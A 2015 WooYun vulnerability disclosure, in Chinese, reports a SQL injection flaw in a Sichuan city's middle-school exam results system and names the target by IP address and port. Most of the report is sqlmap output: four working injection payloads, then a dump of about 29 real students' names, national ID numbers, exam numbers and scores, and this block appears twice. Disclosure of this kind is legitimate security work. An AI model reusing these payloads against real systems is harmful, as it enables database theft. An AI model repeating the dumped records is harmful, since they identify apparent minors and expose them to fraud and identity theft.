当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122160

漏洞标题:四川某市中考查询系统暴露数十万考生信息(可被用于电话诈骗等)

相关厂商:某市

漏洞作者: 路人甲

提交时间:2015-06-22 21:24

修复时间:2015-08-08 15:14

公开时间:2015-08-08 15:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-22: 细节已通知厂商并且等待厂商处理中
2015-06-24: 厂商已经确认,细节仅向厂商公开
2015-07-04: 细节向核心白帽子及相关领域专家公开
2015-07-14: 细节向普通白帽子公开
2015-07-24: 细节向实习白帽子公开
2015-08-08: 细节向公众公开

简要描述:

某市中考查询系统暴露考生所有信息,从身份证信息,准考证,成绩,录取学校等,可以轻易被用于其他用途。

详细说明:

http://61.157.144.46:8080/查询地址
存在SQL注入,输入'or'a'='a,可以获得相应信息,通过sqlmap可以获得整个数据库,从2012年到2015年所有考生中考信息,包括身份证信息等,光2015年信息就有4万余条。
证明,使用post注入可以轻松获得
[INFO] parsing HTTP request from '/root/Desktop/zhongkao'
/root/Desktop/zhongkao
[INFO] resuming back-end DBMS 'microsoft sql server'
[INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sfzh (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sfzh=5634855855555' AND 8347=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8347=8347) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113))) AND 'nRfb'='nRfb&submit=%B3%C9%BC%A8%B2%E9%D1%AF
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: sfzh=5634855855555' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(98)+CHAR(118)+CHAR(113)+CHAR(88)+CHAR(100)+CHAR(99)+CHAR(98)+CHAR(98)+CHAR(100)+CHAR(87)+CHAR(98)+CHAR(119)+CHAR(78)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &submit=%B3%C9%BC%A8%B2%E9%D1%AF
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: sfzh=5634855855555'; WAITFOR DELAY '0:0:5'--&submit=%B3%C9%BC%A8%B2%E9%D1%AF
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: sfzh=56548558555' AND 5005=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'FPPP'='FPPP&submit=%B3%C9%BC%A8%B2%E9%D1%AF
---
[INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[INFO] the SQL query used returns 40080 entries
[INFO] retrieved: "155601100001","25","560106420","96","033","33","510703199911023915","23","92","20","78","G510703199911023915","张豪","84","100","551"
[INFO] retrieved: "155601100002","24","560107309","104","051","31","510703200101033922","22","91","20","80","G510703200101033922","张钰茜","77","111","560"
[INFO] retrieved: "155601100003","29","560104716","124","004","45","510703199911143917","26","80","20","80","G510703199911143917","张鹏清","98","124","626"
[20:54:37] [INFO] retrieved: "155601100004","27","560104729","68","","38","510703200006243921","22","61","20","74","G510703200006243921","刘梦琪","76","103","489"
[INFO] retrieved: "155601100005","27","560107512","118","003","34","510781200003080839","22","94","20","77","G510781200003080839","黄定成","94","115","601"
[20:54:40] [INFO] retrieved: "155601100006","20","560107403","94","","38","510781200009067010","16","78","20","69","G510781200009067010","蒋兴龙","66","66","467"
[INFO] retrieved: "155601100007","11","560109609","121","033","37","510703200004253915","20","76","20","78","G510703200004253915","欧耀龙","78","88","529"
[20:54:43] [INFO] retrieved: "155601100008","29","560107606","147","001","46","51070320000217392X","27","105","20","77","G51070320000217392X","张雨琦","106","126","683"
[20:54:45] [INFO] retrieved: "155601100009","26","560107007","111","033","30","510703200010163916","22","82","20","75","G510703200010163916","陈凯","85","70","521"
[INFO] retrieved: "155601100010","28","560106713","145","002","47","510703200011153912","29","91","20","78","G510703200011153912","康志奇","100","123","661"
[20:54:48] [INFO] retrieved: "155601100011","25","560109313","86","","34","510781199911070702","24","72","19","74","G510781199911070702","袁田田","92","90","516"
[INFO] retrieved: "155601100012","26","560106806","112","033","30","510781199907210848","25","85","20","74","G510781199907210848","莫茜瑶","80","71","523"
[20:54:54] [INFO] retrieved: "155601100013","27","560107105","94","","34","510703200001253944","23","82","20","79","G510703200001253944","李焓芝","76","71","506"
[INFO] retrieved: "155601100014","24","560108822","92","051","42","510704200008072923","21","84","20","76","G510704200008072923","蒲沅园","69","106","534"
[INFO] retrieved: "155601100015","28","560109907","133","001","46","510781200004130703","27","109","20","73","G510781200004130703","李莲溶","103","118","657"
[INFO] retrieved: "155601100016","23","560105002","102","005","39","511002199910117828","19","72","20","75","G511002199910117828","张兰","85","111","546"
[INFO] retrieved: "155601100017","25","560109127","114","271","37","510703200004263929","23","83","20","80","G510703200004263929","尹双凤","89","93","564"
[INFO] retrieved: "155601100018","24","560106920","72","223","39","510703200002083924","17","59","20","74","G510703200002083924","宋文凤","112","109","526"
[INFO] retrieved: "155601100019","24","560108918","100","033","30","511025200001145549","16","73","20","70","G511025200001145549","梁雪","80","107","520"
[INFO] retrieved: "155601100020","28","560110111","107","","37","510703200007233944","22","78","20","79","G510703200007233944","陈巧","87","105","563"
[INFO] retrieved: "155601100021","26","560110126","122","003","40","510703199911232434","24","91","20","76","G510703199911232434","兰泽清","87","112","598"
[20:55:15] [INFO] retrieved: "155601100022","29","560107917","144","002","50","510781199912190845","27","104","20","77","G510781199912190845","任雨晴","98","126","675"
[INFO] retrieved: "155601100023","23","560105207","105","033","40","510703200008073911","20","82","20","74","G510703200008073911","杨青龙","78","109","551"
[INFO] retrieved: "155601100024","23","560105610","91","033","38","510703200008213910","17","84","20","74","G510703200008213910","曾雯琪","84","99","530"
[20:55:23] [INFO] retrieved: "155601100025","24","560108007","108","812","37","510703200009083927","23","82","20","80","G510703200009083927","王洋洋","102","109","585"
[INFO] retrieved: "155601100026","27","560108929","142","004","40","510703200001013916","27","96","20","77","G510703200001013916","谭龙","93","111","633"
[INFO] retrieved: "155601100027","22","560106326","105","813","33","510781199901250849","22","85","20","68","G510781199901250849","冯佳函","87","110","552"
[INFO] retrieved: "155601100028","23","560107628","102","051","32","510703200011223925","20","89","20","75","G510703200011223925","王罗喜","83","100","544"
[INFO] retrieved: "155601100029","21","560105804","131","","39","510703200008243925","21","89","20","76","G510703200008243925","魏萍","76","106","579"
这些信息如果被暴露给不法分子 如果用作诈骗应该危害很大。
只读取了部分少量信息,请管理员适当处理。

漏洞证明:

http://61.157.144.46:8080/查询地址
存在SQL注入,输入'or'a'='a,可以获得相应信息,通过sqlmap可以获得整个数据库,从2012年到2015年所有考生中考信息,包括身份证信息等
证明,使用post注入可以轻松获得
[INFO] parsing HTTP request from '/root/Desktop/zhongkao'
/root/Desktop/zhongkao
[INFO] resuming back-end DBMS 'microsoft sql server'
[INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sfzh (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sfzh=5634855855555' AND 8347=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8347=8347) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113))) AND 'nRfb'='nRfb&submit=%B3%C9%BC%A8%B2%E9%D1%AF
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: sfzh=5634855855555' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(98)+CHAR(118)+CHAR(113)+CHAR(88)+CHAR(100)+CHAR(99)+CHAR(98)+CHAR(98)+CHAR(100)+CHAR(87)+CHAR(98)+CHAR(119)+CHAR(78)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &submit=%B3%C9%BC%A8%B2%E9%D1%AF
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: sfzh=5634855855555'; WAITFOR DELAY '0:0:5'--&submit=%B3%C9%BC%A8%B2%E9%D1%AF
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: sfzh=56548558555' AND 5005=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'FPPP'='FPPP&submit=%B3%C9%BC%A8%B2%E9%D1%AF
---
[INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[INFO] the SQL query used returns 40080 entries
[INFO] retrieved: "155601100001","25","560106420","96","033","33","510703199911023915","23","92","20","78","G510703199911023915","张豪","84","100","551"
[INFO] retrieved: "155601100002","24","560107309","104","051","31","510703200101033922","22","91","20","80","G510703200101033922","张钰茜","77","111","560"
[INFO] retrieved: "155601100003","29","560104716","124","004","45","510703199911143917","26","80","20","80","G510703199911143917","张鹏清","98","124","626"
[20:54:37] [INFO] retrieved: "155601100004","27","560104729","68","","38","510703200006243921","22","61","20","74","G510703200006243921","刘梦琪","76","103","489"
[INFO] retrieved: "155601100005","27","560107512","118","003","34","510781200003080839","22","94","20","77","G510781200003080839","黄定成","94","115","601"
[20:54:40] [INFO] retrieved: "155601100006","20","560107403","94","","38","510781200009067010","16","78","20","69","G510781200009067010","蒋兴龙","66","66","467"
[INFO] retrieved: "155601100007","11","560109609","121","033","37","510703200004253915","20","76","20","78","G510703200004253915","欧耀龙","78","88","529"
[20:54:43] [INFO] retrieved: "155601100008","29","560107606","147","001","46","51070320000217392X","27","105","20","77","G51070320000217392X","张雨琦","106","126","683"
[20:54:45] [INFO] retrieved: "155601100009","26","560107007","111","033","30","510703200010163916","22","82","20","75","G510703200010163916","陈凯","85","70","521"
[INFO] retrieved: "155601100010","28","560106713","145","002","47","510703200011153912","29","91","20","78","G510703200011153912","康志奇","100","123","661"
[20:54:48] [INFO] retrieved: "155601100011","25","560109313","86","","34","510781199911070702","24","72","19","74","G510781199911070702","袁田田","92","90","516"
[INFO] retrieved: "155601100012","26","560106806","112","033","30","510781199907210848","25","85","20","74","G510781199907210848","莫茜瑶","80","71","523"
[20:54:54] [INFO] retrieved: "155601100013","27","560107105","94","","34","510703200001253944","23","82","20","79","G510703200001253944","李焓芝","76","71","506"
[INFO] retrieved: "155601100014","24","560108822","92","051","42","510704200008072923","21","84","20","76","G510704200008072923","蒲沅园","69","106","534"
[INFO] retrieved: "155601100015","28","560109907","133","001","46","510781200004130703","27","109","20","73","G510781200004130703","李莲溶","103","118","657"
[INFO] retrieved: "155601100016","23","560105002","102","005","39","511002199910117828","19","72","20","75","G511002199910117828","张兰","85","111","546"
[INFO] retrieved: "155601100017","25","560109127","114","271","37","510703200004263929","23","83","20","80","G510703200004263929","尹双凤","89","93","564"
[INFO] retrieved: "155601100018","24","560106920","72","223","39","510703200002083924","17","59","20","74","G510703200002083924","宋文凤","112","109","526"
[INFO] retrieved: "155601100019","24","560108918","100","033","30","511025200001145549","16","73","20","70","G511025200001145549","梁雪","80","107","520"
[INFO] retrieved: "155601100020","28","560110111","107","","37","510703200007233944","22","78","20","79","G510703200007233944","陈巧","87","105","563"
[INFO] retrieved: "155601100021","26","560110126","122","003","40","510703199911232434","24","91","20","76","G510703199911232434","兰泽清","87","112","598"
[20:55:15] [INFO] retrieved: "155601100022","29","560107917","144","002","50","510781199912190845","27","104","20","77","G510781199912190845","任雨晴","98","126","675"
[INFO] retrieved: "155601100023","23","560105207","105","033","40","510703200008073911","20","82","20","74","G510703200008073911","杨青龙","78","109","551"
[INFO] retrieved: "155601100024","23","560105610","91","033","38","510703200008213910","17","84","20","74","G510703200008213910","曾雯琪","84","99","530"
[20:55:23] [INFO] retrieved: "155601100025","24","560108007","108","812","37","510703200009083927","23","82","20","80","G510703200009083927","王洋洋","102","109","585"
[INFO] retrieved: "155601100026","27","560108929","142","004","40","510703200001013916","27","96","20","77","G510703200001013916","谭龙","93","111","633"
[INFO] retrieved: "155601100027","22","560106326","105","813","33","510781199901250849","22","85","20","68","G510781199901250849","冯佳函","87","110","552"
[INFO] retrieved: "155601100028","23","560107628","102","051","32","510703200011223925","20","89","20","75","G510703200011223925","王罗喜","83","100","544"
[INFO] retrieved: "155601100029","21","560105804","131","","39","510703200008243925","21","89","20","76","G510703200008243925","魏萍","76","106","579"
只读取了部分少量信息,请管理员适当处理。

修复方案:

你们比我厉害。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-06-24 15:13

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置

最新状态:

暂无